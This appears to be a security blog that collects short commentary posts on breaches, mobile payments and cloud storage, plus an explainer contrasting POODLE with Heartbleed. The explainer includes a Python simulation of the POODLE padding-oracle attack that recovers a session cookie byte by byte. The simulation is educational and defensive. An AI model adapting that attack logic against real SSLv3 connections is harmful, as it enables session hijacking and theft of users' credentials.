On this last day of Cyber Security Awareness Month, I thought this was an excellent article outlining two core principles in keeping our PII safe from the bad guys: strong authentication and user awareness.
A good friend and colleague Michael Burgess, CISSP, sent me the following message this morning:
“I’ve been doing some research and thought you may benefit from it (if you haven’t already run across it). Some have begun adding an addition to a well-known acronym and a core principle in information security. I think it is picking up steam and with good reason.
Accountability, as in the process of tracing, or being able to trace, activities to a responsible source…. I think it is a good addition given experiences and how often accountability is needed, or would have been helpful.”
I think Mr. Burgess and the growing movement to expand the traditional CIA triad are spot on. Accountability is an important principle in IT security and is closely tied to the principles of confidentiality, integrity and availability. It speaks to the responsibilities of data stewards and data owners, and to the need for security analysts to capture activity in a form that can be traced back to a specific user or system and to report on anomalous behavior.
Kudos to Michael for bringing this idea forward and continuing the conversation to make our profession stronger.
This type of sharing is an absolutely vital component in the war against the spread of malware and malicious code intended to compromise PII. Every industry should welcome this kind of open conversation and the organizations that foster it.
This is a scary proposition. If you waited more than 7 hours to patch the vulnerability reported on 10/15, you are probably compromised. This speaks to the pressing need to be diligent and to actively monitor for threats via vendor security advisories, news outlets, RSS feeds and other sources.
Many of you have seen press coverage or the many online updates involving the POODLE vulnerability. After the fallout surrounding the Heartbleed vulnerability, websites and web application vendors are not taking any chances and have saturated mailboxes and web banners with alerts for their users. I sincerely appreciate this diligence, but it can lead to some confusion over the risks facing customers and application owners.
Let me start by saying there is a significant difference between Heartbleed and POODLE. Heartbleed was a memory-disclosure bug in the TLS heartbeat extension of OpenSSL, a library that was extremely popular on web servers hosting some of the most frequented sites on the web, including national banks and the world’s largest online retailer. Heartbleed affected millions of online customers and resulted in the loss of tens of thousands of hours in IT resources to validate and upgrade web servers around the world.
Pardon the pun, but POODLE is a completely different animal. POODLE is a flaw in SSLv3 itself, a protocol dating back more than 18 years, rather than in any one implementation. When SSLv3 uses a block cipher in CBC mode, the plaintext is padded out to the block size, but the padding bytes are not covered by the MAC and, apart from the final length byte, are never checked by the receiver. An attacker who sits between browser and server, forces the connection down to SSLv3 by making the TLS handshakes fail, and can make the browser send chosen requests (for example via injected JavaScript) can use that unchecked padding as an oracle to recover secrets such as session cookies one byte at a time, at a cost of roughly 256 requests per byte. Because of its age, SSLv3 is rarely needed on websites today; it has been largely replaced by one of several versions of TLS (Transport Layer Security). Consider these facts:
- SSLv3 was originally released in 1996. TLS 1.0 (Transport Layer Security) was released in 1999 as an upgrade to SSLv3. The latest released version of TLS is 1.2 which became available in August 2008.
- SSLv3 only accounts for approximately 0.3% of all HTTPS Internet connections.
- Of the Alexa Top Million Domains of the Internet, only 0.42% have some reliance on SSLv3, and that is typically tied to a subdomain.
Clearly, the threat footprint for POODLE pales in comparison to Heartbleed. That does not mean we should not take steps to mitigate it. Most of the websites that still offer SSLv3 are moving away from it and toward TLS. Internet Explorer 6.0 is the only major browser still in use that does not enable TLS 1.0 or higher by default, making it the last hurdle for those still forced to support it. In fact, most web browsers are moving to disable support for SSLv3 altogether.
- Firefox Version 34, slated for release on November 25, will disable SSLv3 by default.
- Microsoft has announced its plan to disable support for SSLv3 in Internet Explorer and all of its online services over the next few months.
- Microsoft has also released a FixIt tool that allows users to disable SSLv3 support in any of the currently supported versions of Internet Explorer.
- Google Chrome already implements TLS_FALLBACK_SCSV (Signaling Cipher Suite Value), and Mozilla has committed to adding it in Firefox 35. SCSV is a TLS fallback mechanism: a client that is retrying a connection at a lower protocol version says so in its handshake, and a server that also supports SCSV rejects the retry, which blocks the forced downgrade that POODLE depends on. Because it only works when both the browser and the server implement it, disabling SSLv3 outright remains the definitive fix.
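To make concrete what "unchecked padding" buys an attacker, here is an added example of my own; it is not code from the article, from the POODLE paper or from any browser or server vendor. It simulates the SSLv3 record layer (MAC, then pad, then CBC-encrypt, with only the final padding byte validated) and runs the byte-at-a-time recovery against it. The block cipher is a toy Feistel construction standing in for 3DES or AES, and the keys and the cookie value are constructed for the demo; everything the attack relies on is the record layer's padding check, not the cipher.

```python
import hmac
import hashlib
import os

BLOCK = 16    # cipher block size (AES-sized)
MAC_LEN = 20  # SSLv3 uses a SHA-1 based MAC; HMAC-SHA1 stands in for it here

# Constructed demo values: the session keys and the cookie the attacker wants.
ENC_KEY = os.urandom(16)
MAC_KEY = os.urandom(16)
SECRET = b"sid=c0ffee"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    # Keyed round function for the toy Feistel cipher below.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    """Toy 16-byte block cipher (4-round Feistel). It stands in for 3DES/AES;
    POODLE does not depend on the cipher, only on how SSLv3 uses CBC mode."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        block = data[i:i + BLOCK]
        out += _xor(block_decrypt(key, block), prev)
        prev = block
    return out


def sslv3_seal(enc_key, mac_key, plaintext):
    """SSLv3 record: MAC, then pad, then encrypt. The padding is not covered by the
    MAC and SSLv3 requires no particular value for it; only the last byte (the
    padding length) is meaningful."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - (len(plaintext) + MAC_LEN) % BLOCK
    padding = os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(enc_key, iv, plaintext + mac + padding)


def sslv3_open(enc_key, mac_key, iv, ciphertext):
    """Receiver side, mirroring the SSLv3 weakness: only the length byte is checked
    before the padding is stripped and the MAC verified. Returns None on failure."""
    data = cbc_decrypt(enc_key, iv, ciphertext)
    pad_len = data[-1]
    if pad_len >= BLOCK or len(data) < pad_len + 1 + MAC_LEN:
        return None
    body = data[:len(data) - pad_len - 1]
    plaintext, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(mac, hmac.new(mac_key, plaintext, hashlib.sha1).digest()):
        return None
    return plaintext


def victim_send(prefix_len, suffix_len):
    """The victim's browser, steered by attacker JavaScript, sends a request whose
    path length (prefix) and body length (suffix) the attacker picks, cookie between."""
    return sslv3_seal(ENC_KEY, MAC_KEY, b"P" * prefix_len + SECRET + b"S" * suffix_len)


def server_accepts(iv, ciphertext):
    return sslv3_open(ENC_KEY, MAC_KEY, iv, ciphertext) is not None


def recover_secret(secret_len=len(SECRET), max_tries=1 << 16):
    """Man-in-the-middle recovery of the cookie, about 256 requests per byte."""
    recovered = bytearray()
    for j in range(secret_len):
        # Put cookie byte j in the last position of some block, and make the record
        # length a multiple of BLOCK so the final block is entirely padding (pad_len 15).
        prefix_len = (BLOCK - 1 - j) % BLOCK
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK
        target = (prefix_len + j) // BLOCK  # index of the ciphertext block holding byte j
        for _ in range(max_tries):
            iv, ct = victim_send(prefix_len, suffix_len)
            blocks = [iv] + [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
            # Replace the all-padding last block with the target block and replay it.
            forged = ct[:-BLOCK] + blocks[target + 1]
            if server_accepts(iv, forged):
                # Accepted means D(C_target) xor C_prev_of_last ends in 15, and
                # D(C_target) = P_target xor C_prev_of_target, so the byte falls out.
                recovered.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("no accepting record within max_tries")
    return bytes(recovered)


if __name__ == "__main__":
    print(recover_secret())
```

Each accepted forgery leaks one byte, and the attacker needs on average 256 fresh requests per byte because the CBC chaining value changes with every record. TLS 1.0 and later require every padding byte to equal the length byte, which removes this oracle, so the remediation is to stop offering SSLv3 on both server and client; where both sides implement TLS_FALLBACK_SCSV, the attacker cannot force the downgrade to SSLv3 in the first place.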
As an IT Security professional, I am always thrilled to see the world at large take threats and vulnerabilities seriously. But I do become concerned when the media overreacts to a threat or begins to paint all vulnerabilities and incidents with the same broad brush. By doing so, we either become hyper-sensitive to every threat, large or small, or we become completely desensitized to all threats, leaving us more vulnerable to criminal activity. At the end of the day, I hope we can reach a balance where each incident is dealt with appropriately and given the weight it deserves.
This breach is a bad sign for the future of MCX and CurrentC. Member retailers (Target, Walmart, Dick’s, Chili’s, among many others) have already been hedging their bets in this partnership since the announcement of Apple Pay. This will give them yet another reason to reconsider their payment options and the exclusivity of a CurrentC digital wallet.
The ability to locate and/or remotely wipe stolen or lost smartphones has always been important, but in the age of growing mobile payments via smart devices, this feature is all the more crucial. A potential flaw in Samsung’s offering is a significant red flag, and a potential boon for iPhone proponents.
I am always interested in reading the opinions of seasoned security professionals and this article is no exception. Core national infrastructure as a target for potential attack or breach should give all of us pause.
The holidays are upon us and so are the security concerns associated with all of those credit and debit card transactions. All signs point to a significant surge in malware infection and data breach activity over the next two months. This is concerning for both the retailer and the consumer.
In the attached article, one particular phrase continues to stand out in my mind: “Organizations should operate under the assumption they are in a state of continuous breach,” the report said. This is so true and so telling on many fronts. So many compromises could have been avoided or mitigated if the retailers had approached IT security on a daily basis as if the walls were falling and the enemy were at the gate.
As consumers, each of us should be equally prepared. We should not live in fear and avoid retailers this holiday season, but we should be diligent in our buying practices. We should understand the risks and rewards of the cards we choose to use in transactions and we should consider the retailers with which we shop.
It’s about to be a very busy season indeed…
Kudos to everyone who can take advantage of this deal. I am a huge fan of free disk space. That said, more and more of our lives are ending up in the cloud. Are you considering how you keep that data safe? Do you trust the provider, do you take the reins yourself, or do you do a little of both?